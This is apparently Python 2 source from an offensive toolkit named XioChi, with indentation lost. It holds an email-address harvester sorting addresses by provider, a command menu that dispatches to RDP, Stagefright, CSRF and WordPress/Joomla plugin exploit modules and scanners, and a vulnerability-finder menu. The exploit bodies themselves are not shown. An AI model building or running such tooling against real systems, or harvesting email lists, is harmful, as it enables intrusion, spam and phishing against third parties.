log.logger.single1(cc, "[Outlook]>>", notident)
cc += 1
out.write(notident + "\n")
for gma in result2:
log.logger.single1(count2, "[Gmail]>>", gma)
count2 += 1
gmail.write(gma + "\n")
gmail.close()
yahoo.close()
hotmail.close()
aol.close()
out.close()
print '\n'
log.logger.multi("List On", options[0])
log.logger.multi("Yahoo", +len(result1))
log.logger.multi("Aol", len(result4))
log.logger.multi("Gmail", len(result2))
log.logger.multi("Hotmail", len(result3))
log.logger.multi("Outlook", len(result5))
log.logger.multi(
"Total List",
len(result1 + result2 + result3 + result4 + result5))
log.logger.multi(
"Total List On " + wcolors.color.RED + "[" +
wcolors.color.CYAN + options[0] + wcolors.color.RED + "]",
len(result6))
print ""
log.logger.attack("Removing Duplicate Mail On Saved Folder")
try:
ao = 'output/aol.txt'
yahu = 'output/yahoo.txt'
hotma = 'output/hotmail.txt'
gmai = 'output/gmail.txt'
outlu = 'output/outlook.txt'
aol = set(open(ao).readlines())
yahoo = set(open(yahu).readlines())
hotmail = set(open(hotma).readlines())
gmail = set(open(gmai).readlines())
outlook = set(open(outlu).readlines())
open(ao, 'w').writelines(set(aol))
open(yahu, 'w').writelines(set(yahoo))
open(hotma, 'w').writelines(set(hotmail))
open(gmai, 'w').writelines(set(gmail))
open(outlu, 'w').writelines(set(outlook))
sleep(1)
log.logger.attacksukses("Remove Duplicate Done")
log.logger.multi("Saved On", 'Xiochi/output/<here>')
print ""
log.logger.attacksukses("ReTotal All On Saved Folder")
sleep(1)
log.logger.multi("Yahoo", +len(yahoo))
log.logger.multi("Aol", len(aol))
log.logger.multi("Gmail", len(gmail))
log.logger.multi("Hotmail", len(hotmail))
log.logger.multi("Outlook", len(outlook))
log.logger.multi(
"Total List On Saved Folder",
len(aol) + len(yahoo) + len(gmail) + len(hotmail) +
len(outlook))
print "\n"
emailfilter()
except KeyboardInterrupt:
msg = "Stopped"
log.logger.error(msg)
except IOError:
log.logger.error("File NotFound")
except KeyboardInterrupt:
msg = "Stopped"
log.logger.error(msg)
emailfilter()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>>>" + com
emailfilter()
except (KeyboardInterrupt):
print ""
def main():
try:
line_1 = color.RED + "["+color.CYAN+"XioChi"+color.RED+"] >> "+color.ENDC
terminal = raw_input(line_1)
terminal = terminal.lower()
if terminal[0:3] =='use':
if terminal[4:30] =='exploit/remote_desktop':
RDPexploit.rdpexploit()
main()
if terminal[4:30] =='scanner/google_dork':
dorkgrablink.dorkgrablink()
main()
if terminal[4:30] =='filter/email_list':
emailfilter.emailfilter()
main()
if terminal[4:30] =='csrf/hijacking':
csrfcreated.csrfcreated()
main()
elif terminal[4:30] =='scanner/dir_brute':
dirbrute.dirbrute()
main()
elif terminal[4:30] =='scanner/admin_panel':
admin_panel.admin()
main()
elif terminal[4:30] =='scanner/vulnfinder':
vulnfinderrun.vulnfinderrun()
main()
elif terminal[4:30] =='exploit/stagefright':
mp4xploit.mp4exploit()
main()
elif terminal[4:30] =='exploit/csrf_maker':
csrfcreated.csrfcreated()
main()
elif terminal[4:99] =='wordpress/inboundiomarketing':
ibm.ibm()
main()
elif terminal[4:99] =='wordpress/dzszoomsounds':
dzs.dzs()
main()
elif terminal[4:99] =='wordpress/downloads_manager':
dwn.dwnm()
main()
elif terminal[4:99] =='wordpress/learndash_v1':
hwps.hd()
main()
elif terminal[4:99] =='wordpress/hdwebplayersql':
hwps.hd()
main()
elif terminal[4:99] =='joomla/com_b2jcontact':
com_b2jcontact.b2j()
main()
elif terminal[4:99] =='reversenginer/pyc_decompiler':
pyc_decompiler.pyc_deco()
main()
else:
print color.RED + "[" + color.CYAN + "Unknow Module" + color.RED + "]>> ", terminal[4:99]
main()
elif terminal[0:12] == 'show modules':
modules_database.modules_database()
main()
elif terminal[0:4] =='help':
help.help()
main()
elif terminal[0:2] =='os':
log.logger.single("Command Executed", "\n"+color.CYAN)
os.system(terminal[3:])
print ""
main()
elif terminal[0:5] =='about':
about.about()
main()
elif terminal[0:4] =='exit':
exit()
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>> ", terminal
main()
except(KeyboardInterrupt):
print(color.RED + "\n[*] (Ctrl + C ) Detected, Trying To Exit ..." + color.ENDC)
print(color.YELLOW + "[*] Thank For Using my Pentest Tools ^~^" + color.ENDC)
def vulnfinderrun():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "Vulnerability Finder" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:8] == 'set type':
dork = com[9:40]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Type" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
0]
vulnfinderrun()
elif com[0:10] == 'set target':
pages = com[11:99999]
options[1] = pages
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Target" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
1]
vulnfinderrun()
elif com[0:12] == 'show options':
print(wcolors.color.YELLOW + 26 * "#" + wcolors.color.RED +
"[ Options List ]" + wcolors.color.YELLOW + 26 * "#")
print wcolors.color.CYAN + "Options\t\t Value\t\t\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Type\t\t" + options[
0] + "\t\tSelect Type"
print "Type: <list> for see the type"
print "Target\t\t" + options[1] + "\t\t\tYour Target"
print(wcolors.color.YELLOW + 68 * "#" + wcolors.color.ENDC)
vulnfinderrun()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
vulnfinderrun()
elif com[0:4] == 'help':
help.help()
vulnfinderrun()
elif com[0:4] == 'back':
pass
elif com[0:4] == 'list':
log.logger.info("List Type:")
print '\n'
print wcolors.color.CYAN + "cgitest (Test On web Cgi)"
print "wptest (wordpress find param and info explodb)"
print "weblogictest (Tested On WebLogic)"
print "dirtravwintest (DirTraversalWin Finder)"
print "dirtravunixtest (DirTraversalUnix Finder)"
print "tomcattest (Tested On Tomcat site)"
print "apachetest (Test Brute DirecVuln)" + wcolors.color.ENDC
print ""
vulnfinderrun()
elif com[0:5] == 'about':
about.about()
vulnfinderrun()
elif com[0:3] == 'run':
if options[0] == 'cgitest':
log.logger.attacksukses1("Testing Target", options[1])
vulnfinder.cgivuln(options[1])
vulnfinderrun()
elif options[0] == 'wptest':
log.logger.attacksukses1("Testing Target", options[1])
vulnfinder.wpvuln(options[1])
vulnfinderrun()
elif options[0] == 'dirtravwintest':
log.logger.attacksukses1("Testing Target", options[1])
vulnfinder.dirtraversalwin(options[1])
vulnfinderrun()
elif options[0] == 'dirtravunixtest':
log.logger.attacksukses1("Testing Target", options[1])
vulnfinder.dirtraversalunix(options[1])
vulnfinderrun()
elif options[0] == 'weblogictest':
log.logger.attacksukses1("Testing Target", options[1])
vulnfinder.weblogic(options[1])
vulnfinderrun()
elif options[0] == 'apachetest':
log.logger.attacksukses1("Testing Target", options[1])
vulnfinder.apache(options[1])
vulnfinderrun()
elif options[0] == 'tomcattest':
log.logger.attacksukses1("Testing Target", options[1])
vulnfinder.tomcat(options[1])
vulnfinderrun()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Type NotFound!!" + wcolors.color.RED + "]>> " + com
vulnfinderrun()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
vulnfinderrun()
except (KeyboardInterrupt):
print ""
